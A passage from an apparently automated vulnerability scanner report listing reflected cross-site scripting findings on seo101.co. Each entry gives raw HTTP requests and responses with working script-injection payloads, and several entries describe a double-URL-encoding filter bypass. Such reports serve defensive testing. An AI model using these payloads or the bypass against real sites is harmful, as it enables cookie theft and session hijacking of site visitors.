Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:05:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26942


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img/pr/11db7b\"><script>alert(1)</script>3c5c586d294/pr5.gif seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.130. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9a984%253balert%25281%2529%252f%252f3cc40906233 was submitted in the REST URL parameter 6. This input was echoed as 9a984;alert(1)//3cc40906233 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif9a984%253balert%25281%2529%252f%252f3cc40906233 HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:09:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26884


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img/pr/1/pr5.gif9a984;alert(1)//3cc40906233 SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.131. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb9b1"><script>alert(1)</script>dec17e82b5e was submitted in the REST URL parameter 6. This input was echoed as fb9b1\"><script>alert(1)</script>dec17e82b5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.giffb9b1"><script>alert(1)</script>dec17e82b5e HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:09:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26952


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img/pr/1/pr5.giffb9b1\"><script>alert(1)</script>dec17e82b5e seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.132. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a3eb</script><script>alert(1)</script>94b5fac151e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C9a3eb</script><script>alert(1)</script>94b5fac151e/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:36:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<9a3eb</
...[SNIP]...
<9a3eb</script><script>alert(1)</script>94b5fac151e/title>
...[SNIP]...

4.133. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c5e8"><script>alert(1)</script>7ad64fba9e8 was submitted in the REST URL parameter 1. This input was echoed as 7c5e8\"><script>alert(1)</script>7ad64fba9e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C7c5e8"><script>alert(1)</script>7ad64fba9e8/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:34:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26920


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<7c5e8\"
...[SNIP]...
<7c5e8\"><script>alert(1)</script>7ad64fba9e8/title>
...[SNIP]...

4.134. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload f4813><script>alert(1)</script>f547a5adbb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3Cf4813><script>alert(1)</script>f547a5adbb5/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:33:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<f4813><script>alert(1)</script>f547a5adbb5/title>
...[SNIP]...

4.135. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 18d34%253balert%25281%2529%252f%252fa8813a39408 was submitted in the REST URL parameter 2. This input was echoed as 18d34;alert(1)//a8813a39408 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C18d34%253balert%25281%2529%252f%252fa8813a39408/img/today.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:52:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26831


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<18d34;alert(1)//a8813a39408/img/today.png SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.136. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 886ff><script>alert(1)</script>f494c8a10a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/886ff><script>alert(1)</script>f494c8a10a0/img/today.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:46:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26756


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</886ff><script>alert(1)</script>f494c8a10a0/img/today.png SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.137. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 213dd"><script>alert(1)</script>7992ca893d was submitted in the REST URL parameter 2. This input was echoed as 213dd\"><script>alert(1)</script>7992ca893d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C213dd"><script>alert(1)</script>7992ca893d/img/today.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:46:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26906


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<213dd\"><script>alert(1)</script>7992ca893d/img/today.png seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.138. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d8c3f%253balert%25281%2529%252f%252f4367197c4a2 was submitted in the REST URL parameter 3. This input was echoed as d8c3f;alert(1)//4367197c4a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imgd8c3f%253balert%25281%2529%252f%252f4367197c4a2/today.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:57:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</imgd8c3f;alert(1)//4367197c4a2/today.png SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.139. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b05ed"><script>alert(1)</script>53321847c31 was submitted in the REST URL parameter 3. This input was echoed as b05ed\"><script>alert(1)</script>53321847c31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imgb05ed"><script>alert(1)</script>53321847c31/today.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:52:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26899


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</imgb05ed\"><script>alert(1)</script>53321847c31/today.png seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.140. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 110d3%253balert%25281%2529%252f%252feb8d1b26650 was submitted in the REST URL parameter 4. This input was echoed as 110d3;alert(1)//eb8d1b26650 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png110d3%253balert%25281%2529%252f%252feb8d1b26650 HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:02:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26875


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img/today.png110d3;alert(1)//eb8d1b26650 SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.141. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec158"><script>alert(1)</script>fffcaaaa68f was submitted in the REST URL parameter 4. This input was echoed as ec158\"><script>alert(1)</script>fffcaaaa68f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.pngec158"><script>alert(1)</script>fffcaaaa68f HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:58:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26956


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img/today.pngec158\"><script>alert(1)</script>fffcaaaa68f seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.142. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5f69"><script>alert(1)</script>501bf8a42dd was submitted in the REST URL parameter 1. This input was echoed as e5f69\"><script>alert(1)</script>501bf8a42dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3Ce5f69"><script>alert(1)</script>501bf8a42dd/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:35:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26898


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<e5f69\"
...[SNIP]...
<e5f69\"><script>alert(1)</script>501bf8a42dd/title>
...[SNIP]...

4.143. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2d49</script><script>alert(1)</script>0cd56afdb20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3Cc2d49</script><script>alert(1)</script>0cd56afdb20/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
